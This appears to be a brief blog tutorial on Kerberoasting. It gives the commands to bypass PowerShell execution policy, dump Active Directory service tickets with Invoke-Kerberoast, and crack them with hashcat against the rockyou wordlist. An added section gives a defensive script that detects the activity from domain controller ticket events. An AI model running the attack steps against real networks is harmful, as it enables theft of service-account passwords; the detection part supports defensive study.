How to Kerberoast

  1. Prerequisites
  2. PowerShell
  3. Import & Run
  4. Crack Tokens

Prerequisites

Make sure you’re on a domain-joined computer, or are running PowerShell in the context of a domain user.

Download the required script from GitHub here, or use the local copy found here.


PowerShell

Enable script execution:

powershell -ExecutionPolicy Bypass


Import & Run

Import the Kerberoast module:

Import-Module .\Invoke-Kerberoast.ps1

Run Invoke-Kerberoast:

Invoke-Kerberoast -OutputFormat Hashcat | Export-Csv -Path kerb.csv


Crack Tokens

From the output CSV file, copy the tickets from the Hash column.

Paste these tickets into a text file tickets.txt.

You can use the following command in PowerShell to attempt to crack the tickets with Hashcat:

.\hashcat64.exe -m 13100 -a 0 .\tickets.txt .\rockyou.txt

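
Added example, not part of the original post: a defender-side check for the activity above. Each service ticket request is logged on the domain controller as Security event 4769, and hashcat mode 13100 corresponds to RC4-HMAC tickets (etype 23, logged as 0x17), so one account requesting RC4 tickets for several user-backed services in a short burst stands out. The sample events, the `Find-KerberoastCandidate` name and the thresholds are assumptions made for illustration.

```powershell
# Constructed sample of event 4769 fields; every account and address is made up.
$sample = @'
Time,TargetUserName,ServiceName,TicketEncryptionType,IpAddress
2024-01-10T09:00:01,alice@CORP.EXAMPLE,FILESRV01$,0x12,::ffff:10.0.0.21
2024-01-10T09:03:40,carol@CORP.EXAMPLE,svc-sql,0x17,::ffff:10.0.0.33
2024-01-10T09:14:02,bob@CORP.EXAMPLE,svc-sql,0x17,::ffff:10.0.0.57
2024-01-10T09:14:02,bob@CORP.EXAMPLE,svc-web,0x17,::ffff:10.0.0.57
2024-01-10T09:14:03,bob@CORP.EXAMPLE,svc-backup,0x17,::ffff:10.0.0.57
2024-01-10T09:14:03,bob@CORP.EXAMPLE,svc-report,0x17,::ffff:10.0.0.57
2024-01-10T09:20:15,alice@CORP.EXAMPLE,svc-web,0x12,::ffff:10.0.0.21
'@ | ConvertFrom-Csv

# Hypothetical helper name; thresholds are assumptions to tune per environment.
function Find-KerberoastCandidate {
    param(
        [Parameter(Mandatory)] [object[]] $Records,
        [int] $MinDistinctServices = 3,
        [int] $WindowSeconds = 60
    )
    # Keep RC4-HMAC tickets (etype 23 = 0x17, the type hashcat -m 13100 targets)
    # issued for user-backed services; machine accounts end in '$'.
    $rc4 = $Records | Where-Object {
        $_.TicketEncryptionType -eq '0x17' -and
        $_.ServiceName -notlike '*$' -and $_.ServiceName -ne 'krbtgt'
    }
    foreach ($group in ($rc4 | Group-Object TargetUserName)) {
        $sorted = @($group.Group | Sort-Object { [datetime]$_.Time })
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            # Sliding window: distinct services requested within $WindowSeconds
            $start = [datetime]$sorted[$i].Time
            $end   = $start.AddSeconds($WindowSeconds)
            $burst = @($sorted | Where-Object {
                [datetime]$_.Time -ge $start -and [datetime]$_.Time -lt $end })
            $services = @($burst.ServiceName | Sort-Object -Unique)
            if ($services.Count -ge $MinDistinctServices) {
                [pscustomobject]@{
                    Account          = $group.Name
                    Source           = (@($burst.IpAddress) | Sort-Object -Unique) -join ','
                    DistinctServices = $services.Count
                    Services         = $services -join ','
                    FirstSeen        = $start
                }
                break   # one alert per account
            }
        }
    }
}
Find-KerberoastCandidate -Records $sample | Format-List
```

Against real data, the same fields can be read from event 4769 in the domain controller's Security log instead of the inline sample.
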
This post is licensed under CC BY 4.0 by the author.